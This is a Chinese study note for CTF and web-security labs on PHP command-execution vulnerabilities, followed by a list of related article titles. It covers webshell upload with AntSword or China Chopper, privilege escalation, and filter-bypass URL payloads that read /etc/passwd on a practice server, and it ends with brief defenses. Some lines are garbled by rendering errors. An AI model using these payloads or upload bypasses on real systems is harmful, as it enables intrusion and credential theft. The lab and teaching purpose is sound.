御剑扫出admin登录后台,出现一个flag
基本信息:有一个flag
上传一句话木马图片:抓包修改为php,蚁剑或菜刀连接 有个flag.php文件
信息泄露包括源码泄露,配置等

命令执行漏洞:(非代码执行)
应用程序源代码功能实现需要执行系统命令的函数,如果命令连接符控制此函数,就能执行系统命令,。 &,| || 都可以作为连接符使用,如果没有对函数过滤,导致在没有绝对路径的情况下被执行。
常见函数:system函数 exec函数 passthru函数 ``反单引号
system (string KaTeX parse error: Expected 'EOF', got '&' at position 15: command [,int &̲return_var])

exec(string KaTeX parse error: Expected 'EOF', got '&' at position 16: command[,array &̲output[,int &return_var]])

passthru(string KaTeX parse error: Expected 'EOF', got '&' at position 14: command[,int &̲])

``(单引号)

主要是widows和linux:

windows:如果我们的服务器是一台Windows操作系统,存在着命令执行漏洞。对Windows服务器系统进行扫描探测、进行进程和服务管理、进行内网渗透、服务器提限等。

写一个php。执行:直接在url上写上参数值。例如ipconfig,netstat,
管道符
|:A|B:a的输出作为b的输入
||:A||B:A执行失败后执行B,类似if else
&&:A&&B:A执行成功执行BB



提权:
上传webshell,大马骑小马,
上传exp,闪电小子等脚本,

linux:

&
&&
|
||

判断有没有管理员权限:
使用id:

uid=501,为普通用户。
http://120.78.92.198:8030.练习环境
1:空格绕过:

$IFS函数,分隔符,有空格功能

%09 tab的url编码,也可以代替空格:

{}绕过,将需要空格的命令使用{}括起来:

/**/ 等号为like
绕过主要是服务器
黑名单(改后缀,复写,相近语言也可以执行,比如jsps可以当作jsp。asp可以asps,cer,asa。php可以为php2,php3,php5. 比如apache的城域网组,解析,从右往左,多后缀),
白名单(修改content-type,内存结算,双重识别时伪造真实图片,过滤文件内容时,提前转义/,木马变形,)

2:关键词命令过滤:
变量拼接:
http://120.78.92.198:8030/exec/03.php?ip=127.0.0.1;a=c;b=at; a a ab%20/etc/passwd
绕过cat

通过空变量绕过:
http://120.78.92.198:8030/exec/03.php?ip=127.0.0.1;ca${x}t%20/etc/passwd

cat变为:ca${x}t。 ${x}为空
不会被执行,所以cat被执行。

-<绕过:

http://120.78.92.198:8030/exec/03.php?ip=127.0.0.1;ca${x}t%3C/etc/passwd

%3c即<:

系统变量绕过:
是 系 统 自 动 变 量 , 可 以 利 用 系 统 变 量 的 字 符 拼 接 为 命 令 执 行 h t t p : / / 120.78.92.198 : 8030 / e x e c / 03. p h p ? i p = 127.0.0.1 ; 是系统自动变量,可以利用系统变量的字符拼接为命令执行 http://120.78.92.198:8030/exec/03.php?ip=127.0.0.1; 是系统自动变量,可以利用系统变量的字符拼接为命令执行http://120.78.92.198:8030/exec/03.php?ip=127.0.0.1;{SHELLOPTS:3:1}at%20/etc/passwd

反斜杠绕过:
http://120.78.92.198:8030/exec/03.php?ip=127.0.0.1;c\a\t%20/etc/passwd

base64编码绕过:

命令执行漏洞防御:
1:
php配置文件禁用敏感函数 disable functions配置文件

2过滤函数:escapesheeearg函数。

BEES CMS 获取flag 命令执行漏洞相关推荐

  1. 【web安全】——命令执行漏洞(RCE)详解

    作者名:Demo不是emo  主页面链接:主页传送门 创作初心:舞台再大,你不上台,永远是观众,没人会关心你努不努力,摔的痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷 座右铭:不要让时代的悲哀 ...

  2. ctfshow-萌新-web11( 利用命令执行漏洞获取网站敏感文件)

    ctf.show 萌新模块 web11关, 这一关考察的是命令执行漏洞的利用, 源码中过滤了一部分命令执行函数和文件查看的命令, 推荐使用 passthru()函数配合 more命令获取敏感文件中的f ...

  3. ctfshow-萌新-web10( 利用命令执行漏洞获取网站敏感信息)

    ctf.show 萌新模块 web10关,这一关考察的是命令执行漏洞的利用,闯关者需要知道3个以上PHP命令执行函数的使用,推荐使用 passthru() 页面中展示了部分源码,并提示我们 flag ...

  4. Hack The Box - Meta 利用Exiftool远程代码执行漏洞获取webshell,ImageMagrick命令执行漏洞横向提权,更改环境配置SUDO纵向提权

    Hack The Box - Meta Hack The Box开始使用流程看这篇 文章目录 Hack The Box - Meta 整体思路 1.Nmap扫描 2.Exiftool远程代码执行漏洞( ...

  5. RCE漏洞以及命令执行漏洞

    目录 概念 代码执行和命令执行区别 代码执行漏洞特点 命令执行漏洞特点 漏洞形成条件 漏洞产生地方 如何检测漏洞 白盒情况下 黑盒情况下 防御方案 变量过滤或固定 WAF产品防火墙防护 敏感函数禁用 ...

  6. ctfshow-萌新-web9( 利用命令执行漏洞读取网站敏感文件)

    ctf.show 萌新模块 web9关,这一关考察的是命令执行漏洞的利用方式,使用PHP的命令执行函数执行系统命令,读取网站根目录下的配置文件,获取flag 页面中展示了部分源码,很明显是作者提示我们 ...

  7. REC代码及命令执行漏洞

    RCE代码及命令执行漏洞 1.RCE介绍 全称:remote command/code execute 分为远程命令执行和远程代码执行 1.命令执行漏洞: 直接调用操作系统命令 代码执行漏洞: 靠执行 ...

  8. 30.WEB漏洞-RCE代码及命令执行漏洞

    30:WEB漏洞-RCE代码及命令执行漏洞 参考文章:https://www.cnblogs.com/zhengna/p/15775737.html 本文为博主学习复现笔记 文章目录 30:WEB漏洞 ...

  9. struts2漏洞_十大常见web漏洞——命令执行漏洞

    命令执行漏洞在不同框架下都有存在,也是十分普遍且危害极大,下面我们介绍一个最具代表性的,也是影响范围最大的一个命令执行漏洞--Struts2远程代码执行漏洞. Struts2 漏洞介绍 ApacheS ...

  10. 【注意】关于Redis存在远程命令执行漏洞的安全公告

    点击蓝色"程序猿DD"关注我 回复"资源"获取独家整理的学习资料! 来源:CNVD漏洞平台 安全公告编号:CNTA-2019-0024 2019年7月10日,国 ...

最新文章

  1. linux oracle 配置监听器
  2. break stop java_在Java中使用break退出循环是不好的做法吗?
  3. openwrt上wifi探针的实现
  4. LOJ:相框(欧拉回路、分类讨论)
  5. 根本不值得一提的乒乓球国手王浩
  6. vue垂直布局_vue实现长图垂直居上 vue实现短图垂直居中
  7. 年龄到底怎么算才对_如意甘霖vs嘉和保,到底谁才是最佳男性重疾险
  8. C语言小知识---数据类型
  9. 企业级实际性能测试案例与经验分享
  10. 自旋锁、排队自旋锁、MCS锁、CLH锁
  11. Opus 和 AAC 声音编码格式
  12. unbuntu下gedit编辑花屏(重影 )问题解决
  13. 蜀门207服务端GM命令大全
  14. arcgis 空间交集 计算_基于ArcGIS的GIS缓冲区与叠加分析的综合应用——以大型商场选址为例...
  15. 特斯拉“深陷”召回/监管调查,“高田气囊门”是前车之鉴
  16. STL--list的模拟实现
  17. 传智播客C语言视频第二季(第一季基础上增加诸多C语言案例讲解,有效下载期为10.5-10.10关闭)
  18. 十分钟文档化你的C++代码——DoxyGen
  19. 垃圾回收之三色标记法
  20. NDK-r25交叉编译glib-2.73.3

热门文章

  1. 【Ubuntu16.04】GeForce RTX 2080显卡配置Openpose环境教程
  2. 人的大脑就像是计算机英文翻译,英语作文50字带翻译-人脑和电脑
  3. ros版本apollo7.0.0规划控制算法
  4. 解决QT添加外部链接库的“cannot find -libusb-1.0”及error: No rule to make target之类问题
  5. 神策新一代分析引擎架构演进
  6. 基于JavaEE的网上企业办公自动化管理系统_JSP网站设计_SqlServer数据库设计目
  7. 关于宿管阿姨调研可能会问的问题
  8. 纳税服务系统【用户模块之日期组件、上传头像、编辑头像】
  9. wordpress子主题
  10. Winsock编程二:简单的聊天程序